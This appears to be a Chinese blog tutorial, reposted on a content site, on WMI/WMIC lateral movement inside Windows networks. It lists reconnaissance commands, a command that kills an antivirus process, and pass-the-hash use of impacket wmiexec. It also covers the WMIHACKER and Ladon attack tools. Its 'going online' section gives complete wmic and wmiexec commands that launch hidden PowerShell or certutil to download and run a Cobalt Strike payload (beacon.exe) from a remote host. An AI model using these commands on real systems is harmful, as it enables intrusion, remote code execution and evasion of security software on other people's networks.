【内网安全-横向移动】WMI-WMIC命令&相关内网工具

这篇具有很好参考价值的文章主要介绍了【内网安全-横向移动】WMI-WMIC命令&相关内网工具。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、WMI

1、简述:

 1)官方介绍:

2)优点:

3)条件:

4)不足:

5)WMIC管理命令:

6)相关工具:

 2、上线:

1、wmic

2、impacket-wmiexec

3、wmicmd.exe

4、WMIHACKER


一、WMI

1、简述:

 1)官方介绍:

WMI 具有管理员和 WMI 提供程序编写器使用的多个命令行工具

WMI 命令行工具 - Win32 apps | Microsoft Learnhttps://learn.microsoft.com/zh-cn/windows/win32/wmisdk/wmi-command-line-tools


2)优点:

内网中大多数 Win系统自带 wmic 命令,并且该方法不会在目标日志系统留下痕迹,支持用户名明文或者hash的方式进行认证


3)条件:

目标主机开放 135 端口(建立连接);且允许随机一个高位端口进行数据通信;需要本地管理员或域管理员权限;部分命令可能不可用(如查询杀软);防火墙开放连接、通信端口


4)不足:

系统自带的 WMIC ,连接执行命令无回显--->将执行的返回结果写入文件--->读取文件内容


5)WMIC管理命令:

(命令来自网络)

1、常用命令:
wmic logon list brief            #登录⽤户
wmic ntdomain list brief         #域控机器
wmic useraccount list brief      #⽤户列表
wmic share get name,path         #查看系统共享
wmic service list brief |more    #服务列表
wmic startup list full           #识别开机启动的程序,包括路径
wmic fsdir "c:\\test" call delete             #删除C盘下的test目录
wmic nteventlog get path,filename,writeable   #查看系统中开启的⽇志
wmic nicconfig get ipaddress,macaddress       #查看系统中⽹卡的IP地址和MAC地址
wmic qfe get description,installedOn          #使⽤wmic识别安装到系统中的补丁情况
wmic product get name,version                 #查看系统中安装的软件及版本
wmic useraccount where "name='%UserName%'" call rename newUserName   #更改当前用户名
wmic useraccount where "name='Administrator'" call Rename admin      #更改指定用户名
wmic bios list full | findstr /i "vmware"     #查看当前系统是否是VMWARE(按实际情况进行筛选)
wmic desktop get screensaversecure,screensavertimeout       #查看当前系统是否有屏保,及延迟
wmic process where name="vmtoolsd.exe" get executablepath   #获取指定进程可执行文件的路径
wmic environment where "name='temp'" get UserName,VariableValue      #获取temp环境变量

2、查询当前主机的杀毒软件(可能无法正常使用)
wmic process where "name like '%forti%'" get name
wmic process where name="FortiTray.exe" call terminate
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
wmic /namespace:\\root\securitycenter2 path antispywareproduct GET displayName,productState, pathToSignedProductExe & wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

3、查询windows机器版本和服务位数和.net版本
wmic os get caption
wmic os get osarchitecture
wmic OS get Caption,CSDVersion,OSArchitecture,Version
wmic product where "Name like 'Microsoft .Net%'" get Name, Version


4、查询本机所有盘符
wmic logicaldisk list brief
wmic logicaldisk get description,name,size,freespace /value

5、卸载和重新安装程序
wmic product where "name like '%Office%'" get name
wmic product where name="Office" call uninstall

6、查看某个进程的详细信息 (路径,命令⾏参数等)
wmic process where name="chrome.exe" list full
wmic process where name="frp.exe" get executablepath,name,ProcessId   进程路径
wmic process where caption="frp.exe" get caption,commandline /value

7、更改PATH环境变量值,新增c:\whoami
wmic environment where "name='path' and username='<system>'" set VariableValue="%path%;c:\whoami

8、查看某个进程的详细信息-PID
wmic process list brief
tasklist /SVC | findstr frp.exe
wmic process where ProcessId=3604 get ParentProcessId,commandline,processid,executablepath,name,CreationClassName,CreationDate

9、终⽌⼀个进程
wmic process where name ="xshell.exe" call terminate
ntsd -c q -p 进程的PID
taskkill -im pid

10、获取电脑产品编号和型号信息
wmic baseboard get Product,SerialNumber
wmic bios get serialnumber

11、安装软件
wmic product get name,version
wmic product list brief

12、使用Powershell操作wmi
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share    #共享
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile   #⽂件/⽬录列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume   #磁盘卷列表
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process  #当前进程
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service  #列举服务
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent           #⽇志
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser         #登陆账户
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering  #补丁
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct #杀毒软件

13、操作系统相关信息
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS

14、注册表操作
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv
Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty OptionalComponents

6)相关工具:

wmiexec.py

impacket/wmiexec.py at master · fortra/impacket (github.com)https://github.com/fortra/impacket/blob/master/examples/wmiexec.py

(impacket 工具包里)提供了通过 wmi 执行命令并回显的功能(445、135 和高位随机端口;445端口是SMB连接,完成执行命令的回显),未开放也支持无回显的方式进行命令执行

注:特殊字符用\转移,如@--->\@
1、连接
python3 wmiexec.py  用户名:密码\@目标IP
python3 wmiexec.py  域名/用户名:密码\@目标IP

2、执行命令 
python3 wmiexec.py  域名/用户名:密码\@目标IP  "命令"

3、哈希传递获得shell
python3 wmiexec.py -hashes LM-Hash:NT-Hash 域名/用户名\@目标IP

4、获得shell后,执行命令
python3 wmiexec.py -hashes LM-Hash:NT-Hash 域名/用户名\@目标IP "命令"   

Windows操作系统中的密码一般由两部分组成,一部分为LM Hash,另一部分为NTLM Hash

即:username:RID:LM-HASH:NT-HASH

——————

wmicmd

1、简述:一个仅使用WMI的小型实用程序:执行命令shell命令、从这些命令中捕获标准输出并写入注册表、读取然后从注册表中删除、打印到本地标准输出(需要.NET相应版本)

2、项目地址:

nccgroup/WMIcmd: A command shell wrapper using only WMI for Microsoft Windows (github.com)https://github.com/nccgroup/WMIcmd(使用方法项目地址里有)

——————

WMIHACKER

1、简述:将执行结果写入到注册表(方法:使用事件触发器调用 VB 代码,达到命令执行效果)

2、区别:(都是写入注册表)wmiexe.py 和 wmicmd 是通过创建win32Process 进程执行命令
3、项目地址:

rootclay/WMIHACKER: A Bypass Anti-virus Software Lateral Movement Command Execution Tool (github.com)https://github.com/rootclay/WMIHACKER

——————

Ladon插件(集成)

项目地址:

Releases · k8gege/Ladon (github.com)https://github.com/k8gege/Ladon/releases

功能如下:

1、网络资产收集
多协议探测存活主机
仅ICMP探测存活(快)
Oxid多网卡主机探测
多协议操作系统探测
网站、标题、Banner
智能网站CMS识别
常见端口服务探测
Shiro探测
Cisco探测
LDAP服务器探测
FTP服务器探测
枚举MSSQL服务器
枚举共享资源

2、系统信息探测
SMB探测系统信息
WMI探测系统信息
NBT探测系统信息
RDP探测系统信息
SNMP探测系统信息
MSSQL探测系统信息
WINRM探测系统信息
Exchange探测系统信息

3、远程漏洞检测
SMB永恒之蓝检测
SMB永恒之黑检测
Struts2漏洞检测
Weblogic漏洞检测
PhpStudy后门检测
ActiveMQ漏洞检测
Tomcat漏洞检测

4、一键GetShell
Exchange CVE-2020-0688
Weblogic GetShell
Tomcat GetShell

5、网络密码嗅探
FTP密码嗅探
HTTP密码嗅探

6、网络密码审计
445端口SMB密码审计(Windows)
135端口WMI密码审计(Windows)
445端口SMB-HASH密码审计(Windows)
135端口WMI-HASH密码审计(Windows)
139端口NBT密码审计(Windows)
5985端口Winrm密码审计(Windows)
21端口FTP密码审计(多平台)
5900端口VNC密码审计(多平台)
389端口LDAP密码审计(Windows)
1521端口Oracle数据库密码审计(多平台)
1433端口SQL数据库密码审计(Windows)
3306端口MYSQL数据库密码审计(多平台)
7001端口Weblogic后台密码审计(多平台)
Web端口Tomcat后台密码审计(多平台)
Web端口401基础认证密码审计(多平台)
22端口SSH密码审计(Linux_多平台)
网络摄像头密码审计(401认证)

7、本机执行
sc服务执行(system权限)
at计划任务(system权限)
Runas(模拟用户执行)
RunPS(无powershell执行)
ForExec(循环执行命令)

8、远程执行
WinrmExec
SshExec
SmbExec
PsExec
AtExec
WmiExec
WmiExec2
WinrmExec
JspShell
AspShell
AspxShell
PhpShell


9、本地提权
BypassUac
eventvwr
fodhelper
computerdefaults
sdclt
slui

BypassUac2
GetSystem
Runas
ms16135
BadPotato
SweetPotato
RDPHijack
CVE-2021-1675

10、自启动
注册表自启动
服务启动项

11、3389远程桌面
一键开启3389
查看3389远程连接
查看管理员组用户
激活Administrator
激活用户Guest
远程桌面会话劫持

12、远程下载
Http文件下载
FTP文件下载

13、域(DC、LDAP)
域内机器信息获取(域内)
389端口LDAP服务器探测
389端口LDAP密码审计
CVE-2020-1472域控提权

14、后门/木马查看
注册表启动项
系统却持DLL

15、域名解析
Domain2IP
Host2IP

16、端口转发
netsh(系统自带)
PortTran

17、本机信息收集
查看本机IP(内外网)
当前用户、特权信息
GUID、CPUID、DiskID
基础信息(仅cmd获取)
基础信息(含wmi获取)
获取命令行参数
获取进程详细信息
查看IE代理信息
查看本机命名管道
查看3389远程连接
查看USB使用记录
查看管理员组用户
查看最近访问文件
查看安装.NET版本
查看PowerShell版本
查看已安装程序版本

18、本机密码读取
IIS站点密码
CVE-2021-36934
DumpLsass

19、MSF/NC联动
Shell_bind_tcp
Shell_reverse_tcp
Met_reverse_http
Met_reverse_https
Shell_reverse_icmp
Shell_reverse_dns

20、其它功能
网站HTML源码查看

 2、上线:

1、wmic

1)方法一:

Attacks--->Web Drive-by--->Scripted Web Delivery(脚本式网页递送)

内网横向移动工具箱下载,0X09【内网安全】,安全,服务器,网络

进行相关的配置(与后面上线cs命令,紧密贴合)

设置监听器、以及Type为powershell

内网横向移动工具箱下载,0X09【内网安全】,安全,服务器,网络

在客户机上执行wmic命令

wmic /NODE:192.168.*.*(目标主机) /user:"用户" /password:"密码" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://*.*.*.*:port/a'))\""

上线cs成功

内网横向移动工具箱下载,0X09【内网安全】,安全,服务器,网络

 ——————

2)方法二:

Attacks--->Packages--->payload generator(有效载荷发生器)

选中监听器--->载荷选Powershell

客户机上执行wmic命令(指定机器上线CS)

wmic /NODE:192.168.*.* /user:"用户" /password:"密码" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://*.*.*.*:port/payload.ps1');\""

2、impacket-wmiexec

1)执行命令

交互式&单执行
wmiexec ./administrator:密码@192.168.*.*(目标主机) "whoami"
wmiexec -hashes :值 ./administrator@192.168.*.*(目标主机) "whoami"

——————

2)下载后门

wmiexec ./administrator:密码@192.168.*.*(目标主机) "cmd.exe /c certutil -urlcache -split -f http://192.168.*.*/beacon.exe c:/beacon.exe"

——————

3)执行后门
wmiexec ./administrator:密码@192.168.*.*(目标主机) "cmd.exe /c c:/beacon.exe"


3、wmicmd.exe

(需要.NET环境)

1)在工作组上使用

WMIcmd.exe -h IP -d hostname -u localadmin -p theirpassword -c "command"

2)在域内使用

WMIcmd.exe -h IP -d domain -u domainadmin -p theirpassword -c "command"

4、WMIHACKER

使用方法来自GitHub

rootclay/WMIHACKER:绕过防病毒软件横向移动命令执行工具 (github.com)https://github.com/rootclay/WMIHACKER

1、命令执行后显示结果
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1

2、命令执行后不显示任何结果
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0

3、获取交互式shell
cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"

4、文件上传:将本地calc.exe复制到远程主机c:\calc.exe
cscript wmihacker_0.6.vbs /upload 172.16.94.187 administrator "Password!" 
"c:\windows\system32\calc.exe" "c:\calc"

5、文件下载:将远程主机calc.exe下载到本地c:\calc.exe
cscript wmihacker_0.6.vbs /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"

 文章来源地址https://www.toymoban.com/news/detail-813622.html

 

到了这里,关于【内网安全-横向移动】WMI-WMIC命令&相关内网工具的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

    横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.( 传递攻击主

    2024年02月08日
    浏览(41)
  • 内网安全:IPC协议横向移动

    目录 网络拓扑图 网络环境说明 IPC协议 域渗透实战 域内信息收集:域控主机用户凭据网络 IPC协议横向移动 - 执行命令 一. 建立IPC连接 二. 拷贝执行文件到目标机器 三. 添加计划任务 IPC协议横向移动 - CS插件 IPC协议横向移动 - Impacket(常用) EXE版本测试  Py版本测试 - 代理

    2024年04月25日
    浏览(40)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(46)
  • 【内网安全-横向移动】IPC$连接--->计划任务--->上线

    目录 一、信息收集(目标用户密码) 1、简述 1、收集信息充当字典 2、收集方法 二、横向移动 1、ipc$ 2、at命令 3、sc命令: 4、schtasks(计划任务) 三、利用示例 1、流程: 2、示例: 四、工具 1、cs插件---LSTAR - Aggressor 2、impacket-atexec 1、收集信息充当字典 1) 目标字典 :域内网

    2024年01月16日
    浏览(41)
  • 8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRMWinRS-明文NTLM 1.探针可用: 2.连接执行: 3.上线 CSMSF: 4.CS 内置横向移动 三、域横向移动-SpnKerberos-请求破解重写 Kerberoasting攻击的利用:

    2024年02月19日
    浏览(40)
  • 7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-PTH-MimikatzNTLM 1、Mimikatz 2、impacket-atpswmismb 二、域横向移动-PTK-MimikatzAES256 三、域横向移动-PTT-漏洞KekeoTicket  1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证 2、kekeo(高权限,需NTLM)——

    2024年02月19日
    浏览(42)
  • 10、内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

    用途:个人学习笔记,有所借鉴,欢迎指正! 主要针对内网主机中的 域控提权 漏洞,包含漏洞探针和漏洞复现利用。 1、 横向移动-系统漏洞-CVE-2017-0146(ms17-010,永恒之蓝) 永恒之蓝(CVE-2017-0146)复现(超详细)_永恒之蓝模型-CSDN博客 2、 横向移动-域控提权-CVE-2014-6324 3、

    2024年02月21日
    浏览(35)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(37)
  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(41)
  • 内网渗透之linux到linux横向移动-ssh

    一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证 ~/.ssh/config ~/.ssh/known_hosts ~/.bash_history 0x02 环境:THP-csk-lab 1.信息搜集 存活主机 172.16.250.10 172.16.250.30 172.16.250.50 172.16.250端口 22 80 8088 8009 172.16.250.30 端口 22 172.16.250.50 端口 22 2.访问网站进行进一步信息搜集

    2024年02月06日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包